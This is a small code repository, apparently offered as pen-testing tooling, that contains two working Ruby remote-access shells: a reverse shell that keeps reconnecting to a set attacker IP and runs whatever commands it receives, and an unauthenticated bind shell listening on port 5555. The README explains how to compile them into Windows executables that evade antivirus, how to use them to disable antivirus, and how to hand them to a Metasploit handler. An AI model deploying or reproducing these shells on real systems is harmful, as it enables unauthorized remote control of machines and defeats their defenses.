├── revshell.rb
├── shell.rb
└── README.md


/revshell.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | require 'socket'
 4 | require 'open3'
 5 | 
 6 | #Set the Remote Host IP
 7 | RHOST = "192.168.1.10" 
 8 | #Set the Remote Host Port
 9 | PORT = "6667"
10 | 
11 | #Tries to connect every 20 sec until it connects.
12 | begin
13 | sock = TCPSocket.new "#{RHOST}", "#{PORT}"
14 | sock.puts "We are connected!"
15 | rescue
16 |   sleep 20
17 |   retry
18 | end
19 | 
20 | #Runs the commands you type and sends you back the stdout and stderr.
21 | begin
22 |   while line = sock.gets
23 |     Open3.popen2e("#{line}") do | stdin, stdout_and_stderr |
24 |               IO.copy_stream(stdout_and_stderr, sock)
25 |               end  
26 |   end
27 | rescue
28 |   retry
29 | end 
30 | 


--------------------------------------------------------------------------------
/shell.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | require 'socket'
 4 | require 'open3'
 5 | 
 6 | #The number over loop is the port number the shell listens on.
 7 | Socket.tcp_server_loop(5555) do |sock, client_addrinfo|
 8 |   begin
 9 |   while command = sock.gets
10 |     Open3.popen2e("#{command}") do | stdin, stdout_and_stderr |
11 |       IO.copy_stream(stdout_and_stderr, sock)
12 |       end  
13 |       end
14 |    rescue
15 |   break if command =~ /IQuit!/
16 |   sock.write "Command or file not found.\n"
17 |   sock.write "Type IQuit! to kill the shell forever on the server.\n"
18 |   sock.write "Use ^] or ctl+C (telnet or nc) to exit and keep it open.\n"
19 |   retry
20 |    ensure
21 |      sock.close
22 |   end
23 | end
24 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Ruby-Shells
 2 | 
 3 | These are very simple shells, normal and reverse I wrote in ruby to help in pen testing.  Simply you can use them to get a working shell on a box that won't be killed by AV, use it to kill AV then use it to upgrade to a meterperter session or whatever you like.  You can compile them to an executable file to run on systems with no ruby.
 4 | 
 5 | ## revshell.rb
 6 | This is a classic reverse shell.  First change the IP and Port to what you want it to be.  Test it and if all is working setup your attacking box to accept the connections.  Then on a windows box with ruby and the ocra gem installed run this command:
 7 | 
 8 | ocra --verbose revshell.rb
 9 | 
10 | Let it connect to your attacking box.  Then exit the conneciton which will finish the script and allowed it to be compiled.  Now you have a simple reverse shell .exe file that AV won't think twice about.
11 | 
12 | You can use the exploit/multi/handler with the generic/shell_reverse_tcp payload to let a ton of these connect back to you.
13 | 
14 | 
15 | ## shell.rb
16 | This is a normal shell, it is a basic no-auth telnet server on the port you pick, kinda.  Once you connect to it to kill it on the server type IQuit!, otherwise it will stay open as long as you like.
17 | 
18 | Bug: The exist command works fine on everything other than Windows, I don't know why.  In Windows to kill it you have to kill the process or it will stay until reboot.
19 | 
20 | To compile it to a exe using ocra use the command:
21 |  "ocra --verbose --no-dep-run --add-all-core shell.rb" 
22 |  Since I didn't figure out a way to give it an exit command on Windows you have to use the -no-dep-run or the compile will hang forever.  The --add-all-core makes the file HUGE, which is no good.  I have not put the effort into figuring out what it really needs since I normally use the reverse shell, if someone else figures out a better way let me know.
23 |  
24 | ### Limitations
25 | The change directory command doesn't work.  So this: 
26 | cd /etc
27 | ls
28 | doesn't work.  However, this:
29 | ls /etc/
30 | does. 
31 | Also wildcards don't work.  So this:
32 | ls /etc/*.conf
33 | doesn't work.
34 | 
35 | Stay in the shell and don't try to go into another program.  If you vi a file say, it will run and show you the file, but you will never get out of vi and you lost your shell.


--------------------------------------------------------------------------------